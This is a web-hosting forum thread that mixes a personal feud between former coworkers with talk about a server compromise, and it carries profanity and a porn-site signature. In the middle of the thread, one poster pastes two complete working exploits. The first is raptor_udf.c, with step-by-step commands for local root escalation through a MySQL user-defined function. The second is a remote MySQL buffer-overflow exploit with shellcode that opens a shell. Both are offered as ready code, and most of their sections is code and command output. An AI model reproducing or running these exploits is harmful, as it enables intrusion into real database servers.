BusterBunny

50 banned hackers

__________________
my sig caught gonoherpasyphilaids and died

split_joel

I am sorry for what I said, it was dumb of me to post in such anger. There is no truth to what I said about eastman. What I said was said out of anger and was wrong and I appologize. It was not mature of me, and was uncaled for.

__________________
E-mail marketing - Automation Scripting - IP Space
AIM: splitjoelp ICQ: 254759453 skype - splitjoelp 702-941-6465

SplitInfinity

appologize <-- busted again
uncaled <-- busted again

prodiac

With all due respect Mr. Pritchard, a mess *I* made? Funny shit. I spent day in and day out trying to improve the way business/servers was/were handled there. I ran things a hell of a lot better than they were when I got there.

Your point is? You started at split thinking you were a big shot, you still do. You knew fucking NOTHING. You wined and moaned that you wanted to do support shit. Instead you were doing sales, or should I say TRYING to do sales. Instead, you spent all day either on the phone, or talking on AIM, or playing video games. You're nothing but a waste of company time and resources.

Joel, you don't know shit about me. I've been in this the internet/hosting business since you were hiding your veggies in your pockets. You don't know ANYTHING about what I did, or where I came from, before I started at split. And you don't know shit about what I did when I was there.

But since you want to talk about it, thats fine.

I sent my resume on Monster.com to splitinfinity. My phone rang 5 minutes later, it was Chris Jester. I hardly lacked the qualifications required for the position. You want to talk about Chris teaching me everything I know, thats pure bullshit. I ran that support department, ALONE for 4 years. Sure, there were 2 other guys during that time, but they were all worthless. Until Jonathan came along, who was a major help in the hardware department, but as for customer support, server administration .. who was in charge of it all? Until the last year of my stay, Jester was never around, he was never available when you needed him. I'd get the run around much like customers would. I'd be lied to in person, just as if I was another customer. Truth is, I was on my way out that door 2 years before I ever left.. Unfortunately for me, I cared too much about the customers, and didn't want to see them fucked over.

As far as looking for the bigger buck. You have it so wrong dude. I took a PAY CUT, to leave splitinfinity. After 4 years, I took a pay cut just to get away. What does that say?

Jester even asked me to work for him on the side after I moved to a competitor. Several months later, he had Jonathan ask me in person, what it would take for me to come back.. if I wouldn't come back, if I would work on the side.

So what does that say about me, and what I did for Chris. I covered his ass when he needed it.

Joel, let me remind you of the AIM message you sent me a couple days after I left Split. This is when you were still a sales person working off of commission.. wanting to become a tech.
--
Session Start (prodiac:SplitJoelP): Tue May 03 15:04:20 2005
[15:04] SplitJoelP: hey do you think you could help me with somethin real fast?
[15:04] prodiac: what
[15:05] SplitJoelP: chris just gave me a new server and i got it setup, but i was wondering what files i have to edit to add new users and to specify them to a single directory
--

Now Joel, did you figure it out yet? Just what files do you edit to add new users to a server and specify their home directory?

The only person that has to learn everything they know from Jester, is you.

By the way, stop AIM'ing me to beg me to not post a reply to your message, as you don't want it to make the company you represent, look bad.

Note, I was keeping my sig out of this thread out of respect to your company, but your ignorance shows that respect isn't deserved. I proudly display the fact that Phatservers, is who I left splitinfinity for.

prodiac

Now lets get back on topic and discuss this hacker .. we all know hacker threads can be valuable when filled with important information.

SplitInfinity

So far we know he is somehow gaining root access through mysql to servers
that he targets which run nats. Nats is not the insecure item. Its mysql I believe. Im going throught the c sources tommorrow and ill let you know what the proggie is actually doing.

One thing you always need to make sure of if that any sniffers they installed are killed or made useless.

I found where his sniffer was creating a lock file and I made my own file there that was not readable or writeable with chattr and that cause his sniffer to segfault thus disclosing its location (error message disclosed path to program).

Superterrorizer

Well how about this then.

Received: from mail.suavemente.net (mail.suavemente.net [66.11.112.15])

mail.suavemente.net now shows a forward entry of 66.11.112.16, my guess would be the ips are on the same server, or you just change servers after that one got hacked.

Well thanks for that. We appreciate all the evidence you've put forth to convince us of this. I now believe you and will believe anything else you say from this point forward. Everyone, believe what he is saying. Why? Because he says so, that's why!

That's one hell of a mysql exploit. Let me guess, it was something like this:

"INSERT INTO mail.suavemente.net SELECT AWESOMER00TZ0RKIT./dev/k4rd FROM 65.110.62.120 WHERE THIS.THREAD = BULLSHIT;"

Still doesn't explain how your mail server got rooted, or what that has to do with NATS or why NATS would be running on your mail server, but because you say it does, I believe you.

I didn't make you look dumb, you do a fine job of that on your own.

__________________

SplitInfinity

MySQL has seen many exploits over the years...

one example would be the MySQL UDF Dynamic Library Exploit.

MySQL provides a mechanism by which the default set of functions can be expanded by means of custom written dynamic libraries containing User Defined Functions, or UDFs. If MySQL is installed with root privileges, the UDF mechanism allows an attacker to install and run malicious code as root.

Credit:
The information has been provided by Raptor.
The original article can be found at: http://www.0xdeadbeef.info/exploits/raptor_udf.c

s can be seen from the example usage below, the attack is done by linking the provided code as a dynamic library. If MySQL is installed to run with root privileges, the attacker can then create a UDF which points to his/her malicious code and run it with root privileges.
For more information on MySQL Security visit Hackproofing MySQL

Usage:
$ id
uid=500(raptor) gid=500(raptor) groups=500(raptor)
$ gcc -g -c raptor_udf.c
$ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc
$ mysql -u root -p
Enter password:
[...]
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/raptor/raptor_udf.so'));
mysql> select * from foo into dumpfile '/usr/lib/raptor_udf.so';
mysql> create function do_system returns integer soname 'raptor_udf.so';
mysql> select * from mysql.func;

+-----------+-----+---------------+----------+

| name | ret | dl | type |

+-----------+-----+---------------+----------+

| do_system | 2 | raptor_udf.so | function |

+-----------+-----+---------------+----------+


mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
mysql> \! sh
sh-2.05b$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)

Exploit Code:
raptor_udf.c
/*
* $Id: raptor_udf.c,v 1.1 2004/12/04 14:44:39 raptor Exp $
*
* raptor_udf.c - dynamic library for do_system() MySQL UDF
* Copyright (c) 2004 Marco Ivaldi <[email protected]>
*
* This is an helper dynamic library for local privilege escalation through
* MySQL run with root privileges (very bad idea!). Tested on MySQL 4.0.17.
*
* Code ripped from: http://www.ngssoftware.com/papers/HackproofingMySQL.pdf
*
* "MySQL provides a mechanism by which the default set of functions can be
* expanded by means of custom written dynamic libraries containing User
* Defined Functions, or UDFs". -- Hackproofing MySQL
*
* Usage:
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf.c
* $ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/home/raptor/raptor_udf.so'));
* mysql> select * from foo into dumpfile '/usr/lib/raptor_udf.so';
* mysql> create function do_system returns integer soname 'raptor_udf.so';
* mysql> select * from mysql.func;
* +-----------+-----+---------------+----------+
* | name | ret | dl | type |
* +-----------+-----+---------------+----------+
* | do_system | 2 | raptor_udf.so | function |
* +-----------+-----+---------------+----------+
* mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
*/

#include <stdio.h>
#include <stdlib.h>

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
unsigned int arg_count; // number of arguments
enum Item_result *arg_type; // pointer to item_result
char **args; // pointer to arguments
unsigned long *lengths; // length of string args
char *maybe_null; // 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
char maybe_null; // 1 if func can return NULL
unsigned int decimals; // for real functions
unsigned long max_length; // for string functions
char *ptr; // free ptr for func data
char const_item; // 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
if (args->arg_count != 1)
return(0);

system(args->args[0]);

return(0);
}

SplitInfinity

Oh, and then there is this remote exploit:


/* exp for mysql
* proof of concept
* using jmp *eax
* bkbll([email protected],[email protected]) 2003/09/12
* compile:gcc -o mysql mysql.c -L/usr/lib/mysql -lmysqlclient
* DO NOT DISTRUBITED IT
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/select.h>
#include <netdb.h>
#include <mysql/mysql.h>

#define PAD 19*4*2
#define JMPADDR 0x42125b2b
#define ROOTUSER "root"
#define PORT 3306
#define MYDB "mysql"
#define ALTCOLUMSQL "ALTER TABLE user CHANGE COLUMN Password Password LONGTEXT"
#define LISTUSERSQL "SELECT user FROM mysql.user WHERE user!='root' OR user='root LIMIT 1,1'"
#define FLUSHSQL "\x11\x00\x00\x00\x03\x66\x6C\x75\x73\x68\x20\x70\ x72\x69\x76\x69\x6C\x65\x67\x65\x73"
#define BUF 1024

MYSQL *conn;
char NOP[]="90";
/*
char shellcode[]=
"31c031db31c9b002"
"cd8085c0751b4b31"
"d2b007cd8031c0b0"
"40cd8089c331c9b1"
"09b025cd80b001cd"
"80b017cd8031c050"
"405089e331c9b0a2"
"cd80b1e089c883e8"
"0af7d04089c731c0"
"404c89e250505257"
"518d4c240431dbb3"
"0ab066cd805983f8"
"017505803a497409"
"e2d231c04089c3cd"
"8089fbb103b03f49"
"cd8041e2f851686e"
"2f7368682f2f6269"
"89e351682d696c70"
"89e251525389e131"
"d231c0b00bcd8090";
*/
char shellcode[]=
"db31c03102b0c931"
"c08580cd314b1b74"
"cd07b0d2b0c03180"
"8980cd40b1c931c3"
"cd25b009cd01b080"
"cd17b08050c03180"
"e3895040a2b0c931"
"e0b180cde883c889"
"40d0f70ac031c789"
"e2894c4057525050"
"244c8d51b3db3104"
"cd66b00af8835980"
"800575010974493a"
"c031d2e2cdc38940"
"b1fb8980493fb003"
"e24180cd6e6851f8"
"6868732f69622f2f"
"6851e389706c692d"
"5251e28931e18953"
"b0c031d29080cd0b";

int type=1;
struct
{
char *os;
u_long ret;
} targets[] =
{
{ "glibc-2.2.93-5", 0x42125b2b },
},v;

void usage(char *);
void sqlerror(char *);
MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname);

main(int argc,char **argv)
{
MYSQL_RES *result;
MYSQL_ROW row;
char jmpaddress[8];
char buffer[BUF],muser[20],buf2[800];
my_ulonglong rslines;
struct sockaddr_in clisocket;
int i=0,j,clifd,count,a;
char data1,c;
fd_set fds;
char *server=NULL,*rootpass=NULL;

if(argc<3) usage(argv[0]);
while((c = getopt(argc, argv, "d:t:p:"))!= EOF)
{
switch &#169;
{
case 'd':
server=optarg;
break;
case 't':
type = atoi(optarg);
if((type > sizeof(targets)/sizeof(v)) || (type < 1))
usage(argv[0]);
break;
case 'p':
rootpass=optarg;
break;
default:
usage(argv[0]);
return 1;
}
}
if(server==NULL || rootpass==NULL)
usage(argv[0]);
memset(muser,0,20);
memset(buf2,0,800);
printf("@-------------------------------------------------@\n");
printf("# Mysql 3.23.x/4.0.x remote exploit(2003/09/12) #\n");
printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
printf("---------------------------------------------------\n");
printf("[+] Connecting to mysql server %s:%d....",server,PORT);
fflush(stdout);
conn=mysqlconn(server,PORT,ROOTUSER,rootpass,MYDB) ;
if(conn==NULL) exit(0);
printf("ok\n");
printf("[+] ALTER user column...");
fflush(stdout);
if(mysql_real_query(conn,ALTCOLUMSQL,strlen(ALTCOL UMSQL))!=0)
sqlerror("ALTER user table failed");
//select
printf("ok\n");
printf("[+] Select a valid user...");
fflush(stdout);
if(mysql_real_query(conn,LISTUSERSQL,strlen(LISTUS ERSQL))!=0)
sqlerror("select user from table failed");
printf("ok\n");
result=mysql_store_result(conn);
if(result==NULL)
sqlerror("store result error");
rslines=mysql_num_rows(result);
if(rslines==0)
sqlerror("store result error");
row=mysql_fetch_row(result);
snprintf(muser,19,"%s",row[0]);
printf("[+] Found a user:%s\n",muser);
memset(buffer,0,BUF);
i=sprintf(buffer,"update user set password='");
sprintf(jmpaddress,"%x",JMPADDR);
jmpaddress[8]=0;
for(j=0;j<PAD-4;j+=2)
{
memcpy(buf2+j,NOP,2);
}
memcpy(buf2+j,"06eb",4);
memcpy(buf2+PAD,jmpaddress,8);
memcpy(buf2+PAD+8,shellcode,strlen(shellcode));
j=strlen(buf2);
if(j%8)
{
j=j/8+1;
count=j*8-strlen(buf2);
memset(buf2+strlen(buf2),'A',count);
}
printf("[+] Password length:%d\n",strlen(buf2));
memcpy(buffer+i,buf2,strlen(buf2));
i+=strlen(buf2);
i+=sprintf(buffer+i,"' where user='%s'",muser);
mysql_free_result(result);
printf("[+] Modified password...");
fflush(stdout);
//get result
//write(2,buffer,i);
if(mysql_real_query(conn,buffer,i)!=0)
sqlerror("Modified password error");
//here I'll find client socket fd
printf("ok\n");
printf("[+] Finding client socket......");
j=sizeof(clisocket);
for(clifd=3;clifd<256;clifd++)
{
if(getpeername(clifd,(struct sockaddr *)&clisocket,&j)==-1) continue;
if(clisocket.sin_port==htons(PORT)) break;
}
if(clifd==256)
{
printf("FAILED\n[-] Cannot find client socket\n");
mysql_close(conn);
exit(0);
}
data1='I';
printf("ok\n");
printf("[+] socketfd:%d\n",clifd);
//let server overflow
printf("[+] Overflow server....");
fflush(stdout);
send(clifd,FLUSHSQL,sizeof(FLUSHSQL),0);
//if(mysql_real_query(conn,FLUSHSQL,strlen(FLUSHSQL) )!=0)
// sqlerror("Flush error");
printf("ok\n");
printf("[+] sending OOB.......");
fflush(stdout);
if(send(clifd,&data1,1,MSG_OOB)<1)
{
perror("error");
mysql_close(conn);
exit(0);
}
printf("ok\r\n");
printf("[+] Waiting a shell.....");
fflush(stdout);
j=0;
memset(buffer,0,BUF);
while(1)
{
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(clifd, &fds);

if (select(clifd+1, &fds, NULL, NULL, NULL) < 0)
{
if (errno == EINTR) continue;
break;
}
if (FD_ISSET(0, &fds))
{
count = read(0, buffer, BUF);
if (count <= 0) break;
if (write(clifd, buffer, count) <= 0) break;
memset(buffer,0,BUF);
}
if (FD_ISSET(clifd, &fds))
{
count = read(clifd, buffer, BUF);
if (count <= 0) break;
if(j==0) printf("Ok\n");
j=1;
if (write(1, buffer, count) <= 0) break;
memset(buffer,0,BUF);
}

}
}

void usage(char *s)
{
int a;
printf("@-------------------------------------------------@\n");
printf("# Mysql 3.23.x/4.0.x remote exploit(2003/09/12) #\n");
printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
printf("---------------------------------------------------\n");
printf("Usage:%s -d <host> -p <root_pass> -t <type>\n",s);
printf(" -d target host ip/name\n");
printf(" -p 'root' user paasword\n");
printf(" -t type [default:%d]\n",type);
printf(" ------------------------------\n");
for(a = 0; a < sizeof(targets)/sizeof(v); a++)
printf(" %d [0x%.8x]: %s\n", a+1, targets[a].ret, targets[a].os);
printf("\n");
exit(0);
}
MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname)
{
MYSQL *connect;
connect=mysql_init(NULL);
if(connect==NULL)
{
printf("FAILED\n[-] init mysql failed:%s\n",mysql_error(connect));
return NULL;
}
if(mysql_real_connect(connect,server,user,pass,dbn ame,port,NULL,0)==NULL)
{
printf("FAILED\n[-] Error: %s\n",mysql_error(connect));
return NULL;
}
return connect;

}
void sqlerror(char *s)
{
fprintf(stderr,"FAILED\n[-] %s:%s\n",s,mysql_error(conn));
mysql_close(conn);
exit(0);
}

SplitInfinity

Oh, and how about the following ones:


4. Ubuntu: MySQL vulnerabilities
(Advisories/Ubuntu)
There are multiple vulnerabilities in MySQL. The following CVEIDs have been addressed: CVE-2006-4227 CVE-2006-4031============================================== ============= Ubuntu Security Notice
16 October 2006



12. Mandriva: Updated MySQL packages rebuilt against updated openssl.
(Advisories/Mandriva)
...penssl recently had several vulnerabilities which were patched CVE-2006-2937,2940,3738,4339, 4343). Some MySQL versions are built against a static copy of the SSL libraries. As a precaution an updated...
02 October 2006


20. Debian: New MySQL 4.1 packages fix several vulnerabilities
(Advisories/Debian)
Several local vulnerabilities have been discovered in the MySQL database server. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2006-4226 CVE-2006-4380- -----
05 September 2006


And the list goes on....

ladida

So how was the hacker connected to the box once you "moved" it?

I'm sorry, but it seems to me you're just marketing your "supposed" work, while infact you're not sure what you're doing.

The 2 exploits you posted, one is local, needing to be first log'd into mysql (didn't check further), second is remote, but do you even know what it does? Or did you just go to google and typed "remote mysql exploit". Not only is it written in 2003 and patched with version 4.0.15, to exploit this you need the mysql root and remote access for that user to be allowed. Even after that, if the exploit works, you don't have root access, but rather the access of the mysqld user, which still wouldn't allow him to run you sniffer in /dev or /lib.

Please don't think we're all sheep here. There's 10000s of mysql exploits out there, very few are capable of gaining remote root (version specific), and you sure as hell don't know about them since you won't find them on google, where you seem to have found these obsolete codes.

__________________
agentGFY *at* gmail.com

edgeprod

Just the MENTION of those fucks at Sago makes me SHUDDER.

Dirty D

FUCK Sagonet....


I am in Tampa and they begged for my biz.

I spun up ONE server and it was the worst experience I have ever had with a hosting company... Shitty network and shitty support.

My comments are not coming from a Newb.
I am a sysadmin and know my servers and bandwidth.

Run, don't walk if you are hosted at Sagonet.
They are costing you business whether you realize it or not.

__________________

Dirty D - ICQ #1326843 - $1 Million Dollars of Bonus Money - 8,000+ FHG!
Glory Hole Girlz - Crack Whore Confessions - Tampa Bukkake - Slut Wife Training - Fuck a Fan
Electricity Play - Porn Video Drive - Theater Sluts - Skunk Riley - Ukraine Amateurs - Strapon Sessions

edgeprod

Big time agree. They almost cost us our Amazon.com contract ...

Moose

Just saw this one... All I can say is ouch.

spacedog

Is this the same thing as the current issue, or something else?